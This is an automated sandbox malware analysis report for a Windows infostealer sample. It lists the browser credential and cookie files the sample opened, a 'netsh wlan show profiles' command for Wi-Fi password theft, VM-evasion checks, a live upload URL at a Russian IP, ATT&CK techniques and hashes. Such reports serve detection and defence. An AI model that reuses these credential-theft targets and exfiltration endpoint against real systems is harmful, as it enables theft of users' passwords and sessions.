    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldbJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.logJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: Yara matchFile source: Process Memory Space: VaXmr82RIb.exe PID: 3364, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts831
    Windows Management Instrumentation
    1
    Scripting
    1
    DLL Side-Loading
    111
    Disable or Modify Tools
    1
    OS Credential Dumping
    1
    File and Directory Discovery
    Remote Services1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading
    11
    Process Injection
    2
    Obfuscated Files or Information
    LSASS Memory134
    System Information Discovery
    Remote Desktop Protocol2
    Data from Local System
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Software Packing
    Security Account Manager931
    Security Software Discovery
    SMB/Windows Admin Shares1
    Email Collection
    11
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Timestomp
    NTDS62
    Virtualization/Sandbox Evasion
    Distributed Component Object Model1
    Clipboard Data
    3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets3
    Process Discovery
    SSHKeylogging3
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts62
    Virtualization/Sandbox Evasion
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
    Process Injection
    DCSync1
    System Network Configuration Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568299 Sample: VaXmr82RIb.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 42 246.229.1.0.in-addr.arpa 2->42 44 icanhazip.com 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Sigma detected: Capture Wi-Fi password 2->54 56 4 other signatures 2->56 8 VaXmr82RIb.exe 15 29 2->8         started        signatures3 process4 dnsIp5 46 89.23.100.233, 1488, 49747 MAXITEL-ASRU Russian Federation 8->46 48 icanhazip.com 104.16.184.241, 49746, 80 CLOUDFLARENETUS United States 8->48 58 Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines) 8->58 60 Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines) 8->60 62 Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines) 8->62 64 11 other signatures 8->64 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        17 WerFault.exe 21 16 8->17         started        20 cmd.exe 1 8->20         started        signatures6 process7 file8 66 Uses netsh to modify the Windows network and firewall settings 12->66 68 Tries to harvest and steal WLAN passwords 12->68 22 tasklist.exe 1 12->22         started        24 conhost.exe 12->24         started        26 netsh.exe 2 15->26         started        28 conhost.exe 15->28         started        30 findstr.exe 1 15->30         started        32 chcp.com 1 15->32         started        40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->40 dropped 34 taskkill.exe 1 20->34         started        36 conhost.exe 20->36         started        38 2 other processes 20->38 signatures9 process10

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    VaXmr82RIb.exe100%AviraTR/AVI.Agent.msilv
    VaXmr82RIb.exe61%ReversingLabsByteCode-MSIL.Trojan.Ursu
    VaXmr82RIb.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://89.23.100.233:14880%Avira URL Cloudsafe
    http://89.23.100.233:1488/uploadt0%Avira URL Cloudsafe
    http://89.23.100.233:1488/upload0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    icanhazip.com
    104.16.184.241
    truefalse
      high
      246.229.1.0.in-addr.arpa
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://icanhazip.com/false
          high
          http://89.23.100.233:1488/uploadtrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://ac.ecosia.org/autocomplete?q=tmp7983.tmp.dat.0.drfalse
            high
            https://www.google.com/images/branding/product/ico/googleg_alldp.icoVaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.drfalse
              high
              https://duckduckgo.com/chrome_newtabVaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drfalse
                high
                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchVaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drfalse
                  high
                  https://duckduckgo.com/ac/?q=tmp795F.tmp.dat.0.drfalse
                    high
                    http://89.23.100.233:1488/uploadtVaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoVaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drfalse
                      high
                      https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drfalse
                        high
                        http://89.23.100.233:1488VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp795F.tmp.dat.0.drfalse
                          high
                          http://icanhazip.comVaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.ecosia.org/newtab/VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.drfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp7983.tmp.dat.0.drfalse
                                  high
                                  https://gemini.google.com/app?q=tmp7983.tmp.dat.0.drfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    89.23.100.233
                                    unknownRussian Federation
                                    48687MAXITEL-ASRUtrue
                                    104.16.184.241
                                    icanhazip.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1568299
                                    Start date and time:2024-12-04 14:42:23 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 18s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected VM Detection
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:VaXmr82RIb.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@25/18@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 235
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                    • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • VT rate limit hit for: VaXmr82RIb.exe
                                    TimeTypeDescription
                                    08:44:38API Interceptor67x Sleep call for process: VaXmr82RIb.exe modified
                                    08:44:49API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    89.23.100.2339fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                        file.exeGet hashmaliciousFlesh StealerBrowse
                                          L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                            vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                              zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                  SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exeGet hashmaliciousUnknownBrowse
                                                    104.16.184.241Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                    • icanhazip.com/
                                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                    • icanhazip.com/
                                                    uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                    • icanhazip.com/
                                                    yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                    • icanhazip.com/
                                                    5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                    • icanhazip.com/
                                                    LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                    • icanhazip.com/
                                                    9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                                    • icanhazip.com/
                                                    file.exeGet hashmaliciousFlesh StealerBrowse
                                                    • icanhazip.com/
                                                    vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                                    • icanhazip.com/
                                                    zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                    • icanhazip.com/
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    icanhazip.comPdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                    • 104.16.184.241
                                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                    • 104.16.184.241
                                                    K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                                    • 104.16.185.241
                                                    uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                    • 104.16.184.241
                                                    yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                    • 104.16.184.241
                                                    jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                    • 104.16.185.241
                                                    5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                    • 104.16.184.241
                                                    LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                    • 104.16.184.241
                                                    VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                    • 104.16.185.241
                                                    test2.exeGet hashmaliciousUnknownBrowse
                                                    • 104.16.185.241
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.165.166
                                                    QsEn4Jw9pY.lnkGet hashmaliciousUnknownBrowse
                                                    • 172.67.201.111
                                                    https://cdn.tailwindcss.comGet hashmaliciousUnknownBrowse
                                                    • 104.22.21.144
                                                    fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 172.67.177.134
                                                    ylNk78QlB8.lnkGet hashmaliciousUnknownBrowse
                                                    • 172.67.201.111
                                                    sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                    • 162.159.61.3
                                                    B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    MAXITEL-ASRUInstaller_setup32_64x.exeGet hashmaliciousLummaC, StealcBrowse
                                                    • 89.23.96.109
                                                    9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                                    • 89.23.100.233
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 89.23.100.233
                                                    file.exeGet hashmaliciousFlesh StealerBrowse
                                                    • 89.23.100.233
                                                    L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                                    • 89.23.100.233
                                                    vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                                    • 89.23.100.233
                                                    Ham9SAD0Ou.docGet hashmaliciousUnknownBrowse
                                                    • 89.23.98.98
                                                    file.dllGet hashmaliciousMatanbuchusBrowse
                                                    • 89.23.113.220
                                                    file.dllGet hashmaliciousMatanbuchusBrowse
                                                    • 89.23.113.220
                                                    zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                    • 89.23.100.233
                                                    No context
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):1.418626455954073
                                                    Encrypted:false
                                                    SSDEEP:192:3gscZdxjc+rmWbktauo75E6UVWA9R25ndDu76kfAIO8K:36ZDjAWbktal5EX94dDu76kfAIO8K
                                                    MD5:3942F3D778754B64509D0AB3358BEC9A
                                                    SHA1:FC57BDFB2568029356787BE0499FEE88569E603B
                                                    SHA-256:4FE0666108ADDF255763E7294C5937A7AC685FB77C0F32C3AEEAFEF76C16A4B0
                                                    SHA-512:1BDAF465EF40107C8D86221797B72A765B205A52E7297748B63E36EF319892ECE187F75FECE7B65E0066EEA439253CAF29B74121B61D2872AF4DB190386E42EF
                                                    Malicious:true
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.9.3.4.8.6.5.1.9.6.2.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.9.3.4.8.7.0.1.9.4.8.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.9.6.1.9.5.1.-.1.9.c.a.-.4.7.3.f.-.9.f.f.2.-.2.e.e.2.8.6.8.4.1.b.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.0.6.1.1.a.6.8.-.3.7.1.7.-.4.6.b.4.-.9.7.0.9.-.1.5.e.2.0.1.e.c.7.3.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.a.X.m.r.8.2.R.I.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.2.4.-.0.0.0.1.-.0.0.5.0.-.9.6.2.0.-.4.6.a.4.5.2.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.b.7.3.4.6.0.6.1.f.7.e.7.0.e.c.a.b.f.1.8.3.1.f.e.9.6.4.e.4.d.0.0.8.0.b.3.1.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Wed Dec 4 13:44:46 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):260125
                                                    Entropy (8bit):4.057891402390053
                                                    Encrypted:false
                                                    SSDEEP:3072:OgO3EyS94uEqYLTgECPOdOHfSY5rnhPNrtO:O3EyK4BTgECX8
                                                    MD5:B9CAC37A5AC1F3BFDE89655CAA624874
                                                    SHA1:C9635453891AB54D0A301669ECB3FB216A9589F7
                                                    SHA-256:AB5517E0AD09A0DC31E31CB3F71C8958E3F0F905441FE2257AEB910228D6C5E3
                                                    SHA-512:5C299BD921E6B2A4F0CE22AECA383183E5683729EDB5B646FFB37B2EB581CEBA09C776901BA62BEC041AB6F362840C3504005A46AADA9E1D3EF1658BE027E951
                                                    Malicious:false
                                                    Preview:MDMP..a..... ........\Pg............4............,..H.......<....4......T%..*G..........`.......8...........T............w..]...........@4..........,6..............................................................................bJ.......6......GenuineIntel...........T.......$....\Pg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8360
                                                    Entropy (8bit):3.68079109253751
                                                    Encrypted:false
                                                    SSDEEP:192:R9l7lZNiIKl6m6Yv0SUjhtWgmfZdCP4YMpDT89bpuasfEjm:R9lnNix6m6YsSUtMgmfDCQwpu5f9
                                                    MD5:79C71CA565122487E0936CB9FB6A6052
                                                    SHA1:2E430BCD57B265A6EA3F01ABC8DB60310678AD86
                                                    SHA-256:898CF3BEAA9C7A2684D3275075EE6CAB01C13F341163A8981DA8209BC2DF0DF7
                                                    SHA-512:7B66840B34350856D3F607F5AC71C583F9E5F953DD42875F5955F11583961F17AD1798BCDF9041342DAC58352CE03F91B73303B4AFEEB10D1CA0F574D2E3E205
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.6.4.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4865
                                                    Entropy (8bit):4.473644778192249
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwwtl8zsTe702I7VFJ5WS2Cfjkws3rm8M4JSVpLPF5Co+q8vlVpLyILNUk77FC:uILfq7GySPfSJSyoKlTLNVXSd
                                                    MD5:5443D7E24AE5453C047A8A669576884D
                                                    SHA1:F9A25E5057E41ACFB333E3626BFCE531878935A8
                                                    SHA-256:F2D583ACD7E50A9ED199D61AFA9FD20A5F5B2DE91A7E8A73A60A94CDED8D8DCE
                                                    SHA-512:15F11B42191C30BD452A632C6DBEAA91D70889B2B697DBDDB0655EFB2873B17149E7DCFE58D06E2B13A4A10179B35124F27F49DE3FDD60B2DD17C5B555FF60C9
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222960416" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):15119
                                                    Entropy (8bit):5.63468773874796
                                                    Encrypted:false
                                                    SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                    MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                    SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                    SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                    SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                    Malicious:false
